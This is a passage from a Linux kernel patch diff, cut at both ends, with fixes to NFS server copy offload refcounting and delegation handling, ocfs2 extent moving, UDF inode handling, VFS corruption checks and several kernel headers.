+-			refcount_dec(&ni->nsui_refcnt);
+-			ni->nsui_expire = jiffies + timeout;
+-			list_add_tail(&ni->nsui_list, &nn->nfsd_ssc_mount_list);
+-			found = true;
+-			break;
+-		}
+-	}
++	list_del(&nsui->nsui_list);
++	/*
++	 * vfsmount can be shared by multiple exports,
++	 * decrement refcnt. If the count drops to 1 it
++	 * will be unmounted when nsui_expire expires.
++	 */
++	refcount_dec(&nsui->nsui_refcnt);
++	nsui->nsui_expire = jiffies + timeout;
++	list_add_tail(&nsui->nsui_list, &nn->nfsd_ssc_mount_list);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	if (!found) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ }
+ 
+ #else /* CONFIG_NFSD_V4_2_INTER_SSC */
+@@ -1551,15 +1532,13 @@ nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy,
+-		      struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+-	*mount = NULL;
+ 	return nfserr_inval;
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+ }
+@@ -1582,13 +1561,6 @@ nfsd4_setup_intra_ssc(struct svc_rqst *rqstp,
+ 				 &copy->nf_dst);
+ }
+ 
+-static void
+-nfsd4_cleanup_intra_ssc(struct nfsd_file *src, struct nfsd_file *dst)
+-{
+-	nfsd_file_put(src);
+-	nfsd_file_put(dst);
+-}
+-
+ static void nfsd4_cb_offload_release(struct nfsd4_callback *cb)
+ {
+ 	struct nfsd4_cb_offload *cbo =
+@@ -1700,18 +1672,27 @@ static void dup_copy_fields(struct nfsd4_copy *src, struct nfsd4_copy *dst)
+ 	memcpy(dst->cp_src, src->cp_src, sizeof(struct nl4_server));
+ 	memcpy(&dst->stateid, &src->stateid, sizeof(src->stateid));
+ 	memcpy(&dst->c_fh, &src->c_fh, sizeof(src->c_fh));
+-	dst->ss_mnt = src->ss_mnt;
++	dst->ss_nsui = src->ss_nsui;
++}
++
++static void release_copy_files(struct nfsd4_copy *copy)
++{
++	if (copy->nf_src)
++		nfsd_file_put(copy->nf_src);
++	if (copy->nf_dst)
++		nfsd_file_put(copy->nf_dst);
+ }
+ 
+ static void cleanup_async_copy(struct nfsd4_copy *copy)
+ {
+ 	nfs4_free_copy_state(copy);
+-	nfsd_file_put(copy->nf_dst);
+-	if (!nfsd4_ssc_is_inter(copy))
+-		nfsd_file_put(copy->nf_src);
+-	spin_lock(&copy->cp_clp->async_lock);
+-	list_del(&copy->copies);
+-	spin_unlock(&copy->cp_clp->async_lock);
++	release_copy_files(copy);
++	if (copy->cp_clp) {
++		spin_lock(&copy->cp_clp->async_lock);
++		if (!list_empty(&copy->copies))
++			list_del_init(&copy->copies);
++		spin_unlock(&copy->cp_clp->async_lock);
++	}
+ 	nfs4_put_copy(copy);
+ }
+ 
+@@ -1749,8 +1730,8 @@ static int nfsd4_do_async_copy(void *data)
+ 	if (nfsd4_ssc_is_inter(copy)) {
+ 		struct file *filp;
+ 
+-		filp = nfs42_ssc_open(copy->ss_mnt, &copy->c_fh,
+-				      &copy->stateid);
++		filp = nfs42_ssc_open(copy->ss_nsui->nsui_vfsmount,
++				      &copy->c_fh, &copy->stateid);
+ 		if (IS_ERR(filp)) {
+ 			switch (PTR_ERR(filp)) {
+ 			case -EBADF:
+@@ -1764,11 +1745,10 @@ static int nfsd4_do_async_copy(void *data)
+ 		}
+ 		nfserr = nfsd4_do_copy(copy, filp, copy->nf_dst->nf_file,
+ 				       false);
+-		nfsd4_cleanup_inter_ssc(copy->ss_mnt, filp, copy->nf_dst);
++		nfsd4_cleanup_inter_ssc(copy->ss_nsui, filp, copy->nf_dst);
+ 	} else {
+ 		nfserr = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, false);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ 
+ do_callback:
+@@ -1790,8 +1770,7 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			status = nfserr_notsupp;
+ 			goto out;
+ 		}
+-		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy,
+-				&copy->ss_mnt);
++		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy);
+ 		if (status)
+ 			return nfserr_offload_denied;
+ 	} else {
+@@ -1810,12 +1789,13 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 		async_copy = kzalloc(sizeof(struct nfsd4_copy), GFP_KERNEL);
+ 		if (!async_copy)
+ 			goto out_err;
++		INIT_LIST_HEAD(&async_copy->copies);
++		refcount_set(&async_copy->refcount, 1);
+ 		async_copy->cp_src = kmalloc(sizeof(*async_copy->cp_src), GFP_KERNEL);
+ 		if (!async_copy->cp_src)
+ 			goto out_err;
+ 		if (!nfs4_init_copy_state(nn, copy))
+ 			goto out_err;
+-		refcount_set(&async_copy->refcount, 1);
+ 		memcpy(&copy->cp_res.cb_stateid, &copy->cp_stateid.cs_stid,
+ 			sizeof(copy->cp_res.cb_stateid));
+ 		dup_copy_fields(copy, async_copy);
+@@ -1832,18 +1812,22 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	} else {
+ 		status = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, true);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ out:
++	release_copy_files(copy);
+ 	return status;
+ out_err:
++	if (nfsd4_ssc_is_inter(copy)) {
++		/*
++		 * Source's vfsmount of inter-copy will be unmounted
++		 * by the laundromat. Use copy instead of async_copy
++		 * since async_copy->ss_nsui might not be set yet.
++		 */
++		refcount_dec(&copy->ss_nsui->nsui_refcnt);
++	}
+ 	if (async_copy)
+ 		cleanup_async_copy(async_copy);
+ 	status = nfserrno(-ENOMEM);
+-	/*
+-	 * source's vfsmount of inter-copy will be unmounted
+-	 * by the laundromat
+-	 */
+ 	goto out;
+ }
+ 
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index c69f27d3adb79..8852a05126926 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -992,7 +992,6 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 
+ 	stid->cs_stid.si_opaque.so_clid.cl_boot = (u32)nn->boot_time;
+ 	stid->cs_stid.si_opaque.so_clid.cl_id = nn->s2s_cp_cl_id;
+-	stid->cs_type = cs_type;
+ 
+ 	idr_preload(GFP_KERNEL);
+ 	spin_lock(&nn->s2s_cp_lock);
+@@ -1003,6 +1002,7 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 	idr_preload_end();
+ 	if (new_id < 0)
+ 		return 0;
++	stid->cs_type = cs_type;
+ 	return 1;
+ }
+ 
+@@ -1036,7 +1036,8 @@ void nfs4_free_copy_state(struct nfsd4_copy *copy)
+ {
+ 	struct nfsd_net *nn;
+ 
+-	WARN_ON_ONCE(copy->cp_stateid.cs_type != NFS4_COPY_STID);
++	if (copy->cp_stateid.cs_type != NFS4_COPY_STID)
++		return;
+ 	nn = net_generic(copy->cp_clp->net, nfsd_net_id);
+ 	spin_lock(&nn->s2s_cp_lock);
+ 	idr_remove(&nn->s2s_cp_stateids,
+@@ -5298,16 +5299,17 @@ nfs4_upgrade_open(struct svc_rqst *rqstp, struct nfs4_file *fp,
+ 	/* test and set deny mode */
+ 	spin_lock(&fp->fi_lock);
+ 	status = nfs4_file_check_deny(fp, open->op_share_deny);
+-	if (status == nfs_ok) {
+-		if (status != nfserr_share_denied) {
+-			set_deny(open->op_share_deny, stp);
+-			fp->fi_share_deny |=
+-				(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
+-		} else {
+-			if (nfs4_resolve_deny_conflicts_locked(fp, false,
+-					stp, open->op_share_deny, false))
+-				status = nfserr_jukebox;
+-		}
++	switch (status) {
++	case nfs_ok:
++		set_deny(open->op_share_deny, stp);
++		fp->fi_share_deny |=
++			(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
++		break;
++	case nfserr_share_denied:
++		if (nfs4_resolve_deny_conflicts_locked(fp, false,
++				stp, open->op_share_deny, false))
++			status = nfserr_jukebox;
++		break;
+ 	}
+ 	spin_unlock(&fp->fi_lock);
+ 
+@@ -5438,6 +5440,23 @@ nfsd4_verify_deleg_dentry(struct nfsd4_open *open, struct nfs4_file *fp,
+ 	return 0;
+ }
+ 
++/*
++ * We avoid breaking delegations held by a client due to its own activity, but
++ * clearing setuid/setgid bits on a write is an implicit activity and the client
++ * may not notice and continue using the old mode. Avoid giving out a delegation
++ * on setuid/setgid files when the client is requesting an open for write.
++ */
++static int
++nfsd4_verify_setuid_write(struct nfsd4_open *open, struct nfsd_file *nf)
++{
++	struct inode *inode = file_inode(nf->nf_file);
++
++	if ((open->op_share_access & NFS4_SHARE_ACCESS_WRITE) &&
++	    (inode->i_mode & (S_ISUID|S_ISGID)))
++		return -EAGAIN;
++	return 0;
++}
++
+ static struct nfs4_delegation *
+ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 		    struct svc_fh *parent)
+@@ -5471,6 +5490,8 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	spin_lock(&fp->fi_lock);
+ 	if (nfs4_delegation_exists(clp, fp))
+ 		status = -EAGAIN;
++	else if (nfsd4_verify_setuid_write(open, nf))
++		status = -EAGAIN;
+ 	else if (!fp->fi_deleg_file) {
+ 		fp->fi_deleg_file = nf;
+ 		/* increment early to prevent fi_deleg_file from being
+@@ -5511,6 +5532,14 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	if (status)
+ 		goto out_unlock;
+ 
++	/*
++	 * Now that the deleg is set, check again to ensure that nothing
++	 * raced in and changed the mode while we weren't lookng.
++	 */
++	status = nfsd4_verify_setuid_write(open, fp->fi_deleg_file);
++	if (status)
++		goto out_unlock;
++
+ 	spin_lock(&state_lock);
+ 	spin_lock(&fp->fi_lock);
+ 	if (fp->fi_had_conflict)
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 325d3d3f12110..a0ecec54d3d7d 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -363,7 +363,7 @@ void nfsd_copy_write_verifier(__be32 verf[2], struct nfsd_net *nn)
+ 
+ 	do {
+ 		read_seqbegin_or_lock(&nn->writeverf_lock, &seq);
+-		memcpy(verf, nn->writeverf, sizeof(*verf));
++		memcpy(verf, nn->writeverf, sizeof(nn->writeverf));
+ 	} while (need_seqretry(&nn->writeverf_lock, seq));
+ 	done_seqretry(&nn->writeverf_lock, seq);
+ }
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 8f9c82d9e075b..4183819ea0829 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -1202,37 +1202,6 @@ TRACE_EVENT(nfsd_file_close,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_fsync,
+-	TP_PROTO(
+-		const struct nfsd_file *nf,
+-		int ret
+-	),
+-	TP_ARGS(nf, ret),
+-	TP_STRUCT__entry(
+-		__field(void *, nf_inode)
+-		__field(int, nf_ref)
+-		__field(int, ret)
+-		__field(unsigned long, nf_flags)
+-		__field(unsigned char, nf_may)
+-		__field(struct file *, nf_file)
+-	),
+-	TP_fast_assign(
+-		__entry->nf_inode = nf->nf_inode;
+-		__entry->nf_ref = refcount_read(&nf->nf_ref);
+-		__entry->ret = ret;
+-		__entry->nf_flags = nf->nf_flags;
+-		__entry->nf_may = nf->nf_may;
+-		__entry->nf_file = nf->nf_file;
+-	),
+-	TP_printk("inode=%p ref=%d flags=%s may=%s nf_file=%p ret=%d",
+-		__entry->nf_inode,
+-		__entry->nf_ref,
+-		show_nf_flags(__entry->nf_flags),
+-		show_nfsd_may_flags(__entry->nf_may),
+-		__entry->nf_file, __entry->ret
+-	)
+-);
+-
+ #include "cache.h"
+ 
+ TRACE_DEFINE_ENUM(RC_DROPIT);
+diff --git a/fs/nfsd/xdr4.h b/fs/nfsd/xdr4.h
+index 4fd2cf6d1d2dc..510978e602da6 100644
+--- a/fs/nfsd/xdr4.h
++++ b/fs/nfsd/xdr4.h
+@@ -571,7 +571,7 @@ struct nfsd4_copy {
+ 	struct task_struct	*copy_task;
+ 	refcount_t		refcount;
+ 
+-	struct vfsmount		*ss_mnt;
++	struct nfsd4_ssc_umount_item *ss_nsui;
+ 	struct nfs_fh		c_fh;
+ 	nfs4_stateid		stateid;
+ };
+diff --git a/fs/ocfs2/move_extents.c b/fs/ocfs2/move_extents.c
+index 192cad0662d8b..b1e32ec4a9d41 100644
+--- a/fs/ocfs2/move_extents.c
++++ b/fs/ocfs2/move_extents.c
+@@ -105,14 +105,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 	 */
+ 	replace_rec.e_flags = ext_flags & ~OCFS2_EXT_REFCOUNTED;
+ 
+-	ret = ocfs2_journal_access_di(handle, INODE_CACHE(inode),
+-				      context->et.et_root_bh,
+-				      OCFS2_JOURNAL_ACCESS_WRITE);
+-	if (ret) {
+-		mlog_errno(ret);
+-		goto out;
+-	}
+-
+ 	ret = ocfs2_split_extent(handle, &context->et, path, index,
+ 				 &replace_rec, context->meta_ac,
+ 				 &context->dealloc);
+@@ -121,8 +113,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 		goto out;
+ 	}
+ 
+-	ocfs2_journal_dirty(handle, context->et.et_root_bh);
+-
+ 	context->new_phys_cpos = new_p_cpos;
+ 
+ 	/*
+@@ -444,7 +434,7 @@ static int ocfs2_find_victim_alloc_group(struct inode *inode,
+ 			bg = (struct ocfs2_group_desc *)gd_bh->b_data;
+ 
+ 			if (vict_blkno < (le64_to_cpu(bg->bg_blkno) +
+-						le16_to_cpu(bg->bg_bits))) {
++						(le16_to_cpu(bg->bg_bits) << bits_per_unit))) {
+ 
+ 				*ret_bh = gd_bh;
+ 				*vict_bit = (vict_blkno - blkno) >>
+@@ -559,6 +549,7 @@ static void ocfs2_probe_alloc_group(struct inode *inode, struct buffer_head *bh,
+ 			last_free_bits++;
+ 
+ 		if (last_free_bits == move_len) {
++			i -= move_len;
+ 			*goal_bit = i;
+ 			*phys_cpos = base_cpos + i;
+ 			break;
+@@ -1030,18 +1021,19 @@ int ocfs2_ioctl_move_extents(struct file *filp, void __user *argp)
+ 
+ 	context->range = &range;
+ 
++	/*
++	 * ok, the default theshold for the defragmentation
++	 * is 1M, since our maximum clustersize was 1M also.
++	 * any thought?
++	 */
++	if (!range.me_threshold)
++		range.me_threshold = 1024 * 1024;
++
++	if (range.me_threshold > i_size_read(inode))
++		range.me_threshold = i_size_read(inode);
++
+ 	if (range.me_flags & OCFS2_MOVE_EXT_FL_AUTO_DEFRAG) {
+ 		context->auto_defrag = 1;
+-		/*
+-		 * ok, the default theshold for the defragmentation
+-		 * is 1M, since our maximum clustersize was 1M also.
+-		 * any thought?
+-		 */
+-		if (!range.me_threshold)
+-			range.me_threshold = 1024 * 1024;
+-
+-		if (range.me_threshold > i_size_read(inode))
+-			range.me_threshold = i_size_read(inode);
+ 
+ 		if (range.me_flags & OCFS2_MOVE_EXT_FL_PART_DEFRAG)
+ 			context->partial = 1;
+diff --git a/fs/open.c b/fs/open.c
+index 82c1a28b33089..ceb88ac0ca3b2 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1411,8 +1411,9 @@ int filp_close(struct file *filp, fl_owner_t id)
+ {
+ 	int retval = 0;
+ 
+-	if (!file_count(filp)) {
+-		printk(KERN_ERR "VFS: Close: file count is 0\n");
++	if (CHECK_DATA_CORRUPTION(file_count(filp) == 0,
++			"VFS: Close: file count is 0 (f_op=%ps)",
++			filp->f_op)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 48f2d60bd78a2..436025e0f77a6 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1124,6 +1124,11 @@ static int sysctl_check_table_array(const char *path, struct ctl_table *table)
+ 			err |= sysctl_err(path, table, "array not allowed");
+ 	}
+ 
++	if (table->proc_handler == proc_dobool) {
++		if (table->maxlen != sizeof(bool))
++			err |= sysctl_err(path, table, "array not allowed");
++	}
++
+ 	return err;
+ }
+ 
+@@ -1136,6 +1141,7 @@ static int sysctl_check_table(const char *path, struct ctl_table *table)
+ 			err |= sysctl_err(path, entry, "Not a file");
+ 
+ 		if ((entry->proc_handler == proc_dostring) ||
++		    (entry->proc_handler == proc_dobool) ||
+ 		    (entry->proc_handler == proc_dointvec) ||
+ 		    (entry->proc_handler == proc_douintvec) ||
+ 		    (entry->proc_handler == proc_douintvec_minmax) ||
+diff --git a/fs/super.c b/fs/super.c
+index 12c08cb20405d..cf737ec2bd05c 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -491,10 +491,23 @@ void generic_shutdown_super(struct super_block *sb)
+ 		if (sop->put_super)
+ 			sop->put_super(sb);
+ 
+-		if (!list_empty(&sb->s_inodes)) {
+-			printk("VFS: Busy inodes after unmount of %s. "
+-			   "Self-destruct in 5 seconds.  Have a nice day...\n",
+-			   sb->s_id);
++		if (CHECK_DATA_CORRUPTION(!list_empty(&sb->s_inodes),
++				"VFS: Busy inodes after unmount of %s (%s)",
++				sb->s_id, sb->s_type->name)) {
++			/*
++			 * Adding a proper bailout path here would be hard, but
++			 * we can at least make it more likely that a later
++			 * iput_final() or such crashes cleanly.
++			 */
++			struct inode *inode;
++
++			spin_lock(&sb->s_inode_list_lock);
++			list_for_each_entry(inode, &sb->s_inodes, i_sb_list) {
++				inode->i_op = VFS_PTR_POISON;
++				inode->i_sb = VFS_PTR_POISON;
++				inode->i_mapping = VFS_PTR_POISON;
++			}
++			spin_unlock(&sb->s_inode_list_lock);
+ 		}
+ 	}
+ 	spin_lock(&sb_lock);
+diff --git a/fs/udf/file.c b/fs/udf/file.c
+index 5c659e23e578f..8be51161f3e52 100644
+--- a/fs/udf/file.c
++++ b/fs/udf/file.c
+@@ -149,26 +149,24 @@ static ssize_t udf_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 
+ 	down_write(&iinfo->i_data_sem);
+-	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
+-		loff_t end = iocb->ki_pos + iov_iter_count(from);
+-
+-		if (inode->i_sb->s_blocksize <
+-				(udf_file_entry_alloc_offset(inode) + end)) {
+-			err = udf_expand_file_adinicb(inode);
+-			if (err) {
+-				inode_unlock(inode);
+-				udf_debug("udf_expand_adinicb: err=%d\n", err);
+-				return err;
+-			}
+-		} else {
+-			iinfo->i_lenAlloc = max(end, inode->i_size);
+-			up_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
++	    inode->i_sb->s_blocksize < (udf_file_entry_alloc_offset(inode) +
++				 iocb->ki_pos + iov_iter_count(from))) {
++		err = udf_expand_file_adinicb(inode);
++		if (err) {
++			inode_unlock(inode);
++			udf_debug("udf_expand_adinicb: err=%d\n", err);
++			return err;
+ 		}
+ 	} else
+ 		up_write(&iinfo->i_data_sem);
+ 
+ 	retval = __generic_file_write_iter(iocb, from);
+ out:
++	down_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB && retval > 0)
++		iinfo->i_lenAlloc = inode->i_size;
++	up_write(&iinfo->i_data_sem);
+ 	inode_unlock(inode);
+ 
+ 	if (retval > 0) {
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index 34e416327dd4e..a1af2c2e1c295 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -521,8 +521,10 @@ static int udf_do_extend_file(struct inode *inode,
+ 	}
+ 
+ 	if (fake) {
+-		udf_add_aext(inode, last_pos, &last_ext->extLocation,
+-			     last_ext->extLength, 1);
++		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
++				   last_ext->extLength, 1);
++		if (err < 0)
++			goto out_err;
+ 		count++;
+ 	} else {
+ 		struct kernel_lb_addr tmploc;
+@@ -556,7 +558,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 	if (new_block_bytes) {
+@@ -565,7 +567,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 
+@@ -579,6 +581,11 @@ out:
+ 		return -EIO;
+ 
+ 	return count;
++out_err:
++	/* Remove extents we've created so far */
++	udf_clear_extent_cache(inode);
++	udf_truncate_extents(inode);
++	return err;
+ }
+ 
+ /* Extend the final block of the file to final_block_len bytes */
+@@ -792,19 +799,17 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		c = 0;
+ 		offset = 0;
+ 		count += ret;
+-		/* We are not covered by a preallocated extent? */
+-		if ((laarr[0].extLength & UDF_EXTENT_FLAG_MASK) !=
+-						EXT_NOT_RECORDED_ALLOCATED) {
+-			/* Is there any real extent? - otherwise we overwrite
+-			 * the fake one... */
+-			if (count)
+-				c = !c;
+-			laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
+-				inode->i_sb->s_blocksize;
+-			memset(&laarr[c].extLocation, 0x00,
+-				sizeof(struct kernel_lb_addr));
+-			count++;
+-		}
++		/*
++		 * Is there any real extent? - otherwise we overwrite the fake
++		 * one...
++		 */
++		if (count)
++			c = !c;
++		laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
++			inode->i_sb->s_blocksize;
++		memset(&laarr[c].extLocation, 0x00,
++			sizeof(struct kernel_lb_addr));
++		count++;
+ 		endnum = c + 1;
+ 		lastblock = 1;
+ 	} else {
+@@ -1080,23 +1085,8 @@ static void udf_merge_extents(struct inode *inode, struct kernel_long_ad *laarr,
+ 			blocksize - 1) >> blocksize_bits)))) {
+ 
+ 			if (((li->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				(lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				blocksize - 1) & ~UDF_EXTENT_LENGTH_MASK) {
+-				lip1->extLength = (lip1->extLength -
+-						  (li->extLength &
+-						   UDF_EXTENT_LENGTH_MASK) +
+-						   UDF_EXTENT_LENGTH_MASK) &
+-							~(blocksize - 1);
+-				li->extLength = (li->extLength &
+-						 UDF_EXTENT_FLAG_MASK) +
+-						(UDF_EXTENT_LENGTH_MASK + 1) -
+-						blocksize;
+-				lip1->extLocation.logicalBlockNum =
+-					li->extLocation.logicalBlockNum +
+-					((li->extLength &
+-						UDF_EXTENT_LENGTH_MASK) >>
+-						blocksize_bits);
+-			} else {
++			     (lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
++			     blocksize - 1) <= UDF_EXTENT_LENGTH_MASK) {
+ 				li->extLength = lip1->extLength +
+ 					(((li->extLength &
+ 						UDF_EXTENT_LENGTH_MASK) +
+@@ -1381,6 +1371,7 @@ reread:
+ 		ret = -EIO;
+ 		goto out;
+ 	}
++	iinfo->i_hidden = hidden_inode;
+ 	iinfo->i_unique = 0;
+ 	iinfo->i_lenEAttr = 0;
+ 	iinfo->i_lenExtents = 0;
+@@ -1716,8 +1707,12 @@ static int udf_update_inode(struct inode *inode, int do_sync)
+ 
+ 	if (S_ISDIR(inode->i_mode) && inode->i_nlink > 0)
+ 		fe->fileLinkCount = cpu_to_le16(inode->i_nlink - 1);
+-	else
+-		fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	else {
++		if (iinfo->i_hidden)
++			fe->fileLinkCount = cpu_to_le16(0);
++		else
++			fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	}
+ 
+ 	fe->informationLength = cpu_to_le64(inode->i_size);
+ 
+@@ -1888,8 +1883,13 @@ struct inode *__udf_iget(struct super_block *sb, struct kernel_lb_addr *ino,
+ 	if (!inode)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (!(inode->i_state & I_NEW))
++	if (!(inode->i_state & I_NEW)) {
++		if (UDF_I(inode)->i_hidden != hidden_inode) {
++			iput(inode);
++			return ERR_PTR(-EFSCORRUPTED);
++		}
+ 		return inode;
++	}
+ 
+ 	memcpy(&UDF_I(inode)->i_location, ino, sizeof(struct kernel_lb_addr));
+ 	err = udf_read_inode(inode, hidden_inode);
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 06eda8177b5f1..241b40e886b36 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -147,6 +147,7 @@ static struct inode *udf_alloc_inode(struct super_block *sb)
+ 	ei->i_next_alloc_goal = 0;
+ 	ei->i_strat4096 = 0;
+ 	ei->i_streamdir = 0;
++	ei->i_hidden = 0;
+ 	init_rwsem(&ei->i_data_sem);
+ 	ei->cached_extent.lstart = -1;
+ 	spin_lock_init(&ei->i_extent_cache_lock);
+diff --git a/fs/udf/udf_i.h b/fs/udf/udf_i.h
+index 06ff7006b8227..312b7c9ef10e2 100644
+--- a/fs/udf/udf_i.h
++++ b/fs/udf/udf_i.h
+@@ -44,7 +44,8 @@ struct udf_inode_info {
+ 	unsigned		i_use : 1;	/* unallocSpaceEntry */
+ 	unsigned		i_strat4096 : 1;
+ 	unsigned		i_streamdir : 1;
+-	unsigned		reserved : 25;
++	unsigned		i_hidden : 1;	/* hidden system inode */
++	unsigned		reserved : 24;
+ 	__u8			*i_data;
+ 	struct kernel_lb_addr	i_locStreamdir;
+ 	__u64			i_lenStreams;
+diff --git a/fs/udf/udf_sb.h b/fs/udf/udf_sb.h
+index 291b56dd011ee..6bccff3c70f54 100644
+--- a/fs/udf/udf_sb.h
++++ b/fs/udf/udf_sb.h
+@@ -55,6 +55,8 @@
+ #define MF_DUPLICATE_MD		0x01
+ #define MF_MIRROR_FE_LOADED	0x02
+ 
++#define EFSCORRUPTED EUCLEAN
++
+ struct udf_meta_data {
+ 	__u32	s_meta_file_loc;
+ 	__u32	s_mirror_file_loc;
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 20b21b577deaa..9054a5185e1a9 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -296,6 +296,10 @@ int mipi_dsi_dcs_set_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 brightness);
+ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 *brightness);
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness);
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness);
+ 
+ /**
+  * mipi_dsi_dcs_write_seq - transmit a DCS command with payload
+diff --git a/include/drm/drm_print.h b/include/drm/drm_print.h
+index a44fb7ef257f6..094ded23534c7 100644
+--- a/include/drm/drm_print.h
++++ b/include/drm/drm_print.h
+@@ -521,7 +521,7 @@ __printf(1, 2)
+ void __drm_err(const char *format, ...);
+ 
+ #if !defined(CONFIG_DRM_USE_DYNAMIC_DEBUG)
+-#define __drm_dbg(fmt, ...)		___drm_dbg(NULL, fmt, ##__VA_ARGS__)
++#define __drm_dbg(cat, fmt, ...)		___drm_dbg(NULL, cat, fmt, ##__VA_ARGS__)
+ #else
+ #define __drm_dbg(cat, fmt, ...)					\
+ 	_dynamic_func_call_cls(cat, fmt, ___drm_dbg,			\
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 43d4e073b1115..10ee92db680c9 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -484,6 +484,7 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
++	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 634d37a599fa7..cf0d88109e3f9 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -346,6 +346,13 @@ static inline void bpf_obj_init(const struct btf_field_offs *foffs, void *obj)
+ 		memset(obj + foffs->field_off[i], 0, foffs->field_sz[i]);
+ }
+ 
++/* 'dst' must be a temporary buffer and should not point to memory that is being
++ * used in parallel by a bpf program or bpf syscall, otherwise the access from
++ * the bpf program or bpf syscall may be corrupted by the reinitialization,
++ * leading to weird problems. Even 'dst' is newly-allocated from bpf memory
++ * allocator, it is still possible for 'dst' to be used in parallel by a bpf
++ * program or bpf syscall.
++ */
+ static inline void check_and_init_map_value(struct bpf_map *map, void *dst)
+ {
+ 	bpf_obj_init(map->field_offs, dst);
+diff --git a/include/linux/compiler_attributes.h b/include/linux/compiler_attributes.h
+index 898b3458b24a0..b83126452c651 100644
+--- a/include/linux/compiler_attributes.h
++++ b/include/linux/compiler_attributes.h
